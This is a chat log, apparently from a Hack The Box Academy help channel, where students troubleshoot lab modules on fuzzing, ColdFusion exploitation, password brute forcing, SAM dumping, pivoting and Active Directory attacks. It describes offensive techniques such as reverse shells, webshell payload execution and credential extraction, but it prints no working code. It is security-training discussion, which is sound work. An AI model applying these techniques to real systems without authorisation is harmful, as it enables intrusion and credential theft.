It doesn't look like your lists are in the directory you are running crackmapexec from, as it shows one list being used as the username and the other as a password. Either move into the correct directory, move the files to the directory you're in, or provide the path to them, i.e. -u /home/my/file/is/located/here.list and then it should work. Your output would then display usernames and passwords being used.
Hi all, I'm going back through "Web Attacks with Ffuf" and I'm just looking at the hint (Already completed the answer, just trying to re-learn notes.)
Don't forget to remove copyrights from the wordlist, they clutter the results! -- How is this possible to filter out again, or where is that taught? Thanks 🙂
Pretty sure that is with -ic
Yep, first page of the module right at the bottom thanks!! 😄
You might make yourself familiar with the environment and check C:\tools.
dm I will help
Good Afternoon guys, Someone had completed the module AI?
just looking to follow up on this
running into the same issues
i dm u
yes 
Thank you. May I ask one more question?
Is the reason I’m getting "No matching objects found" from accesschk64.exe /accepteula -v \\.\pipe\SQLLocal\SQLEXPRESS01 because the MSSQL$SQLEXPRESS service is not running?
It can't be in running state even with administrator privileges.
Hi.
I am working on HTB Academy - Attacking Common Applications - Attacking ColdFusion. The module asks "What user is ColdFusion running as?"
I have a reverse shell via the ColdFusion exploit they mention in the module text. I run commands that show all of the users on the CF host machine. The module doesn't accept any of them as the correct answer.
I've also run commands that show what processes are running on the machine. and which users are running those processes. The module doesn't accept this user account as the correct answer.
What can / should I do if I am fairly sure I have the correct answer but the module won't accept it? Is there a way to contact HTB support to report it?
I just started the module myself, but is ColdFusion an application? Maybe it needs application user
it is an application
I will dig more on this. Windows is not my forte.
I cannot find a command to list "system" or "application" accounts specifically. I did find another method to list all accounts on the system. It showed the same as the previous two.
Im currently working on "Cracking Passwords with Hashcat", I finished the Module but the only section im stuck on is "Hashing vs. Encryption", its impossible for me to submit the correct Format can someone help me out please? I am certain the Hexadecimal Values are correct.
No, because you are supposed to use \pipe\<name> instead of \\.\pipe\<name> to refer to pipes
Yo man, try to fuzz the host, theres a ColdFusion.txt in seclists/discovery/web-content
I'm not sure, but I was just looking for a certain wordlist and I stumbled upon that, it might help you
Hello everyone, I'm currently enrolled in the AI module. Do someone have or had issues when uploading the model.pth file for the malware classification? I'm getting the "Invalid File" error every time I upload the model. I'm using the save_model function as the module suggested. Thanks in advance
you don't need upload the module 🙂 i'm at the last exercise 🙂
I've been here for almost 4 months xD
xDDDDDD
hi
Oh okay 🙂 thanks!
Sometimes the answer is right in front of you and you don't see it 🙂
Hello I'm on Broken Authentication using ffuf to find out the admin's city (password reset). I've tried tailoring the list to match cities from United Kingdom, then run through all cities. URL is fine, all the headers are ok, everything is correct by my check. Can anyone suggest what am I missing?
EDIT: solved
You can DM what you are trying.
What is the username of the ftp user you find via brute-forcing?
need help, i made my anarchy list now i just dont know what the next step is
figured it
hey guys,
did anyone had issues with nmap port scanning when working on pivoting/tunneling module pwnbox?
Pretty much everything i scan is filtered, but everything else seems normal when i try to connect to rdp it lets me no issues.
i need help with password attacks network services rdp
figured it out, if you ran the resnet50 model on a gpu, dont forget to set it on evaluation mode and bring it back to cpu before saving
Hello
Need more info to help u. use the format of questions
@lime cosmos Please don't post answers to questions.
Password Attacks : Protected Files ,
my problem is brute forcing the ftp is taking a long time ( the pass list 70 k )
i didn't post any answer ?
You posted a screenshot that had an answer to a question.
i'm just asking what i do if the brute forcing takes too much time , and if in the exam there is a brute forcing that takes a long time like this
aaa yes lol sorry
No one can talk about the contents of the exam without risking their certification/account. It's against the rules to talk about the contents of the exam.
ok
HTB has said nothing in the modules should take more than ~30 mins to brute force. I think there was only one question that took a long time in the password attacks module, others were pretty fast if you were doing it right.
They don't want you sitting around for hours trying to crack stuff.
lol in my case .. i try with the pwn box it take me a more then 1 hour to brute forcing the ftp (fast service to brute force )
the mutated-passwords are 70k words
that why am asking maybe my method is wrong or idk
or my internet ...
Use the search feature, as this has been asked numerous times.
Mine has been running for 3 hours for mutated password list still not cracked
You managed to crack it?
We can see ftp is open there but that too is taking painstaking time
I'm in Password Attacks - Attacking SAM. Question 2. I have brought over the SAM, SYSTEM, AND SECURITY hives to my local machine successfully. When I try to run secretsdump.py on them, I get the following error repeatedly: 'NoneType' object is not subscriptable. I have tried copying the command directly from the module, and I still get this error.
Man there are a lot of questions regarding password attacks 😂😭
Is anyone here maybe familiar with AD Enumeration & Attacks - Skills Assessment Part I?
I'm stuck even though I'm exactly following the steps in the walkthrough
yep many people
Well, when I'm in msfconsole and set up all the variables, after I run exploit, there shows this block of code that I should copy and paste in the Antak webshell.
when I do this, there does seem to be some sort of connection
But...
I don't see a 'meterpreter >' prompt
It is possible to enter commands, like ps for example, but when I enter the command the connection dies and when ps gets executed I get ps output from the local system and not the attack box as I expected according to the instructions.
I'm trying to install EyeWitness for the attacking common applications module. I'm getting a 404 error when trying to install one of the dependencies, chromium-driver. Is there any fix to this
404 Not Found [IP: 54.39.128.230 80]
You might need to update your signing key.
Ah. This was it. Thanks
Brother you are creating aspx shell you have to create exe one which you have to upload to web shell and then execute it using start process
You can dm me i will share proper instructions from my notes
hello guys, i have posted https://discord.com/channels/473760315293696010/1373755973667258368
as a request for help if anyone can give me a hint . Thank you for your help ❤️
be patient
In https://academy.hackthebox.com/module/162/section/1534 it says "Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)" and my answer is "||[Ctrl] + [b] + [%]||" idk if its wrong or what
1. You can ask here
2. Don't post spoilers
% isn't a key on its own
The format example isn't the exact number of keys
so i can discuss the module here ? not in the post section !
sorry i didn't mean to spoil
Linux priv esc is above tier 0; you posted a lot of info about the machine.
i'll remove the post right now, sorry man i didn't mean to spoil anyone
I believe the answer is only expecting numbers, not the full python x.y.z
ahh i see how it works, maybe if there was a placeholder to indicate the pattern XD,
sorry again for the spoiler, i really didn't mean anything, im new to the server so i don't know every single detail .
wish you best luck on your journey ❤️
It's in the channel description:)
||[Ctrl] + [b] + [shift] + [5]|| doesnt work either, i dont get what i have to do
hi I'm doing the skills assessment for Pivoting, Tunneling, and Port Forwarding. I got a shell open on my VM to the web server and completed question 1. The file I found in the home folder of the user I found to solve the answer for question 1 doesn't show me the answer to question 2. And I don't see how that's possible because of what question 2 is + because of what the only two files in that user's home folder are. I'm connected as the user via ssh from my VM tho.
can someone help?
I need a hint in the right direction.
the weird part is when i paste x.y.z as a response its WRONG XD, and i'm sure that i have fetched all the files or Proc that has a relation to Python .
any way thank you for the advices and your time
There aren't that many files in the user's home directory. Did you try looking at all of them?
i may have answered in a misleading manner (and the answer is a bit silly, replace 5 with the key)
yes
but the one said says it has credentials lists creds that don't work when I enter them into flag box
now that is, thanks
It's not looking for the full subversion
The one thing you likely didn't try
hahahaha
